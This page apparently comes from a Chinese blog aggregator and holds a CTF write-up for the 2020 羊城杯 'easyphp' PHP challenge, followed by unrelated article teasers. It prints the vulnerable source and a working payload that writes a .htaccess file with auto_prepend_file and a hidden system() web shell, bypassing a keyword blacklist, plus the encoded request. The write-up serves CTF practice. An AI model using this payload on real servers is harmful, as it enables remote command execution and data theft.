[羊城杯 2020] easyphp

news2024/9/24 15:23:22

打开题目,源代码

 <?php
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    if(!isset($_GET['content']) || !isset($_GET['filename'])) {
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET['content'];
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
        echo "Hacker";
        die();
    }
    $filename = $_GET['filename'];
    if(preg_match("/[^a-z\.]/", $filename) == 1) {
        echo "Hacker";
        die();
    }
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    file_put_contents($filename, $content . "\nHello, world");
?>

简单分析一下,先scandir函数来获取指定目录 ./下的所有文件和文件夹的列表,然后如果不为index.php,则unlink函数删除文件。接着就是对上传文件写入内容的黑名单过滤,然后对文件名正则匹配无字母。最后file_put_contents读取文件

既然文件名无字母,我们可以用.htaccess配置文件攻击
思路:向.htaccess文件写入shell,并且用auto_prepend_file包含.htaccess,但是file关键字被ban了,可以用换行绕过,结尾要用\处理content中的\n。

payload

php_value auto_prepend_fil\e .htaccess 
#<?php system('ls /');?>\

注:以注释的方法来写shell
由于这里有换行,我们丢到cyberchef里url编码
成功上传

?filename=.htaccess&content=php_value%20auto_prepend_fil%5Ce%20.htaccess%20%0A#%3C?php%20system('ls%20/');?%3E%5C%20

在这里插入图片描述修改命令,要绕过一下

php_value auto_prepend_fil\e .htaccess 
#<?php system('cat /fl\ag');?>\

编码一下上传,得到flag
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/958344.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

Docker私有镜像仓库(Harbor)安装

Docker私有镜像仓库(Harbor)安装

Docker私有镜像仓库(Harbor)安装 1、什么是Harbor Harbor是类似与DockerHub 一样的镜像仓库。Harbor是由VMware公司开源的企业级的Docker Registry管理项目&#xff0c;它包括权限管理(RBAC)、LDAP、日志审核、管理界面、自我注册、镜像复制和中文支持等功能。Docker容器应用的…
阅读更多...
【附安装包】Lingo 17安装教程

【附安装包】Lingo 17安装教程

软件下载 软件&#xff1a;Lingo版本&#xff1a;17语言&#xff1a;英文大小&#xff1a;55.3M安装环境&#xff1a;Win11/Win10/Win8/Win7硬件要求&#xff1a;CPU2.0GHz 内存4G(或更高&#xff09;下载通道①百度网盘丨64位下载链接&#xff1a;https://pan.baidu.com/s/1-…
阅读更多...
深入解析Kotlin类与对象:构造、伴生、单例全面剖析

深入解析Kotlin类与对象:构造、伴生、单例全面剖析

前言 本篇文章将带您了解Kotlin编程中的重要概念&#xff1a;类及构造函数、访问修饰符、伴生对象和单例模式。就像搭积木一样&#xff0c;我们会逐步揭开这些概念的面纱&#xff0c;让您轻松理解它们的作用和用法。无论您是编程新手还是有经验的开发者&#xff0c;本文都将为…
阅读更多...
Pycharm中无法使用pip安装的包问题解决方案

Pycharm中无法使用pip安装的包问题解决方案

在终端通过pip装好包以后&#xff0c;在pycharm中导入包时&#xff0c;依然会报错。主要原因就是pip把包安装到了“解释器1”&#xff0c;但我们项目使用的是“解释器2”。具体使用的哪个解释器看项目中python解释器的配置。 解决方案一&#xff1a; Pycharm中直接安装第三方库…
阅读更多...
pdf怎么编辑文字?了解一下这几种编辑方法

pdf怎么编辑文字?了解一下这几种编辑方法

pdf怎么编辑文字&#xff1f;PDF文件的普及使得它成为了一个重要的文件格式。然而&#xff0c;由于PDF文件的特性&#xff0c;它们不可直接编辑&#xff0c;这就使得PDF文件的修改变得比较麻烦。但是&#xff0c;不用担心&#xff0c;接下来这篇文章就给大家介绍几种编辑pdf文字…
阅读更多...
强大的处理器和接口支持BL304ARM控制器

强大的处理器和接口支持BL304ARM控制器

在智慧医疗领域&#xff0c;BL304可以用于实现医疗设备的智能化、远程监控和数据交换。在智慧电力领域&#xff0c;BL304可以帮助实现电网的智能化管理&#xff0c;提升电力供应的效率。在智慧安防领域&#xff0c;BL304可以实现智能监控、智能门锁等应用&#xff0c;保障安全。…
阅读更多...
探索未来金融科技 SCF新加坡举办启动盛会

探索未来金融科技 SCF新加坡举办启动盛会

金融科技的热潮涌向新加坡&#xff0c;令人瞩目的SCF金融公链启动会于8月13日隆重举行。这场盛宴不仅为金融科技领域注入了新的活力&#xff0c;更为广大投资者、合作伙伴以及热衷区块链发展的人士提供了一次宝贵的交流机会。 在SCF金融公链启动会上&#xff0c;William Thomps…
阅读更多...
re学习(36)看雪CTF 2017 -Crackme

re学习(36)看雪CTF 2017 -Crackme

百度网盘已收集&#xff0c;需要回顾在文件夹【CTF题库收集】查看即可 刚开始先运行一下 这是一道crackme类型题目&#xff0c;是一道看雪CTF上的竞赛题&#xff0c;用OD进行分析一下。 刚开始用的是IDA分析&#xff0c;分析了半天也没有看出来什么&#xff0c;然后就在网上搜…
阅读更多...
神经网络与卷积神经网络

神经网络与卷积神经网络

全连接神经网络 概念及应用场景 全连接神经网络是一种深度学习模型&#xff0c;也被称为多层感知机&#xff08;MLP&#xff09;。它由多个神经元组成的层级结构&#xff0c;每个神经元都与前一层的所有神经元相连&#xff0c;它们之间的连接权重是可训练的。每个神经元都计算…
阅读更多...
CAD关于在别人图纸上设计点位信息的办法【推荐】

CAD关于在别人图纸上设计点位信息的办法【推荐】

背景&#xff1a; cad中有时候需要在客户的底图上进行设计&#xff0c;如何避免客户的底图影响你的内容呈现呢&#xff0c;就是把他原有的图纸进行“灰色话”&#xff0c;这样你的图层颜色就是都是展示出来了。 1.如何“灰话”呢 步骤&#xff1a; 1.图层特性---选中你使用的…
阅读更多...
昨天面试的时候被提问到的问题集合(答案)

昨天面试的时候被提问到的问题集合(答案)

1、vue的双向绑定原理是什么&#xff1f;里面的关键点在哪里&#xff1f; Vue的双向绑定原理是基于Object.defineProperty或者Proxy来实现的&#xff0c;其关键点在于数据劫持&#xff0c;即对数据的读取和修改进行拦截&#xff0c;在数据发生变化时自动更新视图 2、实现水平垂…
阅读更多...
Python读取遥感影像并计算NDVI指数

Python读取遥感影像并计算NDVI指数

Python读取遥感影像并计算NDVI指数 先附上源码 读取的遥感影像数据需要先进行预处理 from osgeo import gdal import numpy as np import pandas as pd import os np.seterr(divideignore, invalidignore)class Grid:# # 1. 函数1 read_tiff读取影像# def read_tiff(self…
阅读更多...
element中Notification组件(this.$notify)自定义样式

element中Notification组件(this.$notify)自定义样式

1、自定义样式效果 2、vue代码 this.notifications this.$notify({title: ,dangerouslyUseHTMLString: true,duration: obj.remindMethod3 ? 0:4500,customClass: notify-warning,offset: 50,showClose: false,message: this.$createElement("div",null,[this.$…
阅读更多...
五指山下500年

五指山下500年

工作中的困难 在工作中&#xff0c;我曾经遇到一件事情让我有强烈的情绪波动。那是一次团队内部分配任务的时候&#xff0c;我遇到了一个非常棘手的问题。 我需要在几个团队成员之间分配任务&#xff0c;但是我不知道如何分配才能让每个人都满意。我知道&#xff0c;如果任务…
阅读更多...
微服务-sentinel详解

微服务-sentinel详解

文章目录 一、前言二、知识点主要构成1、sentinel基本概念1.1、资源1.2、规则 2、sentinel的基本功能2.1、流量控制2.2、熔断降级 3、控制台安装3.1、官网下载jar包3.2、启动控制台 4、项目集成 sentinel4.1、依赖配置4.2、配置文件中配置sentinel控制台地址信息4.3、配置流控4…
阅读更多...
美国陆军网络司令部利用人工智能增强网络攻防和作战决策能力

美国陆军网络司令部利用人工智能增强网络攻防和作战决策能力

源自&#xff1a; 奇安网情局 声明:公众号转载的文章及图片出于非商业性的教育和科研目的供大家参考和探讨&#xff0c;并不意味着支持其观点或证实其内容的真实性。版权归原作者所有&#xff0c;如转载稿涉及版权等问题&#xff0c;请立即联系我们删除。 “人工智能技术与咨询…
阅读更多...
零侵入,零改造,模拟人的“统计数字员工”成就新时代智能普查

零侵入,零改造,模拟人的“统计数字员工”成就新时代智能普查

“您好&#xff0c;我们是余杭区经济普查员&#xff0c;这是第五次全国经济普查告知书。”近期&#xff0c;小编陆陆续续看到了许多普查人员的辛勤身影。 啥是第五次全国经济普查&#xff1f; 第五次全国经济普查是一项重大国情国力调查&#xff0c;主要目的是全面调查我国第…
阅读更多...
护眼灯什么价位的好?有什么性价比的台灯吗

护眼灯什么价位的好?有什么性价比的台灯吗

台灯是卧室和书房必备的家用电器之一&#xff0c;现在市场上销售的台灯种类琳琅满目&#xff0c;样式让人眼花缭乱&#xff0c;价格和质量又参差不齐&#xff0c;再加上口若悬河的销售人员为产品做广告的误导&#xff0c;如果事先没有做足功课&#xff0c;盲目地去挑选一台适合…
阅读更多...
Kind创建本地环境安装Ingress

Kind创建本地环境安装Ingress

目录 1.K8s什么要使用Ingress 2.在本地K8s集群安装Nginx Ingress controller 2.1.使用Kind创建本地集群 2.1.1.创建kind配置文件 2.1.2.执行创建命令 2.2.找到和当前k8s版本匹配的Ingress版本 2.2.1.查看当前的K8s版本 2.2.2.在官网中找到对应的合适版本 2.3.按照版本安…
阅读更多...
分库分表篇-2.4 springBoot 集成Mycat(1.6) 分库分表,读写分离,分布式事务

分库分表篇-2.4 springBoot 集成Mycat(1.6) 分库分表,读写分离,分布式事务

文章目录 前言一、分库分表&#xff1a;二、读写分离&#xff1a;2.1 读写分离的实现&#xff1a;2.2 主从延迟&#xff1a;2.2.1 主从延迟造成的问题&#xff1a;2.2.2 主从延迟的原因&#xff1a;2.2.3 主从延迟的解决方案&#xff1a;2.2.3.1 db 层面&#xff1a;2.2.3.2 程…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023